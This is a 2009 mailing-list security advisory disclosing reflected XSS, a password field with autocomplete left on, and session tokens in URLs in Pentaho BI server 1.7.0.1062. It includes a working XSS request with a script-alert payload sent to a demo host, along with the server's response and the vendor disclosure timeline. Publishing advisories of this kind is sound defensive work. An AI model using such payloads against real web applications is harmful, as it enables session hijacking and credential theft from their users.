WebApp Sec mailing list archives
[AntiSnatchOr] Pentaho Bi-server multiple vulnerabilities
From: Michele Orru <antisnatchor () gmail com>
Date: Wed, 14 Oct 2009 01:42:45 +0200
Pentaho 1.7.0.1062 Multiple Vulnerabilities Name Multiple Vulnerabilities in Pentaho Systems Affected Pentaho <= 1.7.0.1062 Severity High Impact (CVSSv2) High 7/10, vector: (AV:N/AC:L/Au:S/C:P/I:C/A:P) Vendor http://www.pentaho.com Advisory http://antisnatchor.com/2009/06/20/pentaho-1701062-multiple-vulnerabilities/ Authors Michele "euronymous" Orrù (euronymous AT antisnatchor DOT com) Date 20081224 I. BACKGROUND Pentaho Analysis puts rich, analytic power in the hands of your business users helping them gain the insights and understanding they need to make optimal business decisions. II. DESCRIPTION Multiple vulnerabilities exist in Pentaho . III. ANALYSIS Summary: A) Reflected XSS B) Password field with autocomplete enabled C) Disclosure of Session Tokens in URL A) Reflected XSS The presence of the Cross Site Scripting plague has been veryfied on /pentaho/ViewAction parameters. The attacker-supplied code can perform different actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Users can be induced to issue the attacker's crafted request in various ways. For example, an attacker can send to the victim a link containing a malicious URL in an email or instant message, instead of submit the link to popular web applications that don't escape HTML characters such as <>'\(). An example is the following: GET /pentaho/ViewAction?& outputType=khgj345<script>alert('Pwnd')</script>kjh3535 &solution=opentaps&action=CustomerLifeTimeOrders.xaction&path=Customer%20Analysis HTTP/1.0 User-Agent: Opera/9.63 (Windows NT 5.1; U; en) Presto/2.1.1 Host: demo1.opentaps.org:8181 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: it-IT,it;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Referer: http://demo1.opentaps.org:8181/pentaho/ViewAction?solution=opentaps&path= Customer%20Analysis&action=CustomerLifeTimeOrders.xaction Cookie: JSESSIONID=85740C182994F78946BE8A38605396B1 Cookie2: $Version=1 Proxy-Connection: Keep-Alive When the request will be executed, a popup showing the string Pwnd can be seen. Here the response: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.2.1.GA (build: SVNTag=JBoss_4_2_1_GA date=200707131605)/Tomcat-5.5 content-disposition: inline;filename=Customer_Lifetime_Orders.html Content-Type: text/html;charset=UTF-8 Content-Length: 1615 Date: Wed, 24 Dec 2008 09:55:32 GMT Connection: close <html><head><title>Pentaho BI Platform - Error in Action</title><link rel="stylesheet" type="text/css" href="/pentaho-style/active/default.css"></head><body dir="LTR"><table cellspacing="10"><tr><td class="portlet-section" colspan="3">Failed<hr size="1"/></td> </tr><tr><td class="portlet-font" valign="top"><span style="color:red"> Errore: SecureFilterComponent.ERROR_0001 - "khgj345<script>alert('Pwnd')</script>kjh3535" non è una selezione consentita "outputType" per questo utente (org.pentaho.plugin.core.SecureFilterComponent)</span><p/>Debug: Partenza dellesecuzione di {0}/{1}/{2} (org.pentaho.core.solution.SolutionEngine)<br/>Debug: Lettura del contesto a runtime e dei dati (org.pentaho.core.solution.SolutionEngine)<br/>Debug: Caricamento del file di configurazione dell'Action Sequence (org.pentaho.core.solution.SolutionEngine)<br/> Debug: Audit: instanceId=0113b013-d1a1-11dd-a254-65c8cd8ab409, objectId=org.pentaho.core.runtime.RuntimeContext, messageType=action_sequence_start (org.pentaho.core.runtime.RuntimeContext)<br/>Errore: SecureFilterComponent.ERROR_0001 - "khgj345<script>alert('Pwnd')</script>kjh3535" non è una selezione consentita "outputType" per questo utente (org.pentaho.plugin.core.SecureFilterComponent)<br/>Errore: RuntimeContext.ERROR_0012 - LActionDefinition per {0} non è stata eseguita con successo (org.pentaho.core.runtime.RuntimeContext)<br/>Errore: SolutionEngine.ERROR_0007 - Esecuzione dell'Action Sequence fallita (org.pentaho.core.solution.SolutionEngine)<br/></td> </tr></table><p> [it_41] Server Version Pentaho BI Platform 1.7.0.1062</body></html> The same servlet, /pentaho/ViewAction, contains other two parameters that are vulnerable to reflected XSS: "action" and "path" (that are exploitable in the same way). B) Password field with autocomplete enabled The response to this request: GET /pentaho/Login;jsessionid=857E0C182994F71355BE8A3860539BH7 contains the login form where credentials are passed to the application. [...] <tr> <td colspan="2"><input type='password' name='j_password' size="30" ></td> </tr> [...] The problem is that the autocomplete tag is not set to OFF. We recommend it, especially for the presence of reflected XSS that in this situation can be exploited to retrieve the password input from the browser history. C) Disclosure of Session Tokens in URL The web application session identifier, JSESSIONID, is disclosed in the URL: that's a bad practice because these sensitive informations will be visible in the client browser history, in the Referer header, in bookmarks. An example: http://demo1.opentaps.org:8181/pentaho/Login;jsessionid=857E0C18 2994F71355BE8A38605396B1 IV. DETECTION 1.7.0.1062 and earlier versions are vulnerable. V. WORKAROUND Proper input validation and session management will fix the vulnerabilities. VI. VENDOR RESPONSE No fix available. VII. CVE INFORMATION No CVE at this time. VIII. DISCLOSURE TIMELINE 20081224 Initial vendor contact 20081229 Second vendor contact 20090120 Bugs have been assigned to developers 20090619 Bugs have been finally fixed IX. CREDIT Michele "euronymous" Orru' X. LEGAL NOTICES Copyright (c) 2008 Michele "euronymous" Orru' Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without mine express written consent. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email me for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Current thread:
- [AntiSnatchOr] Pentaho Bi-server multiple vulnerabilities Michele Orru (Oct 16)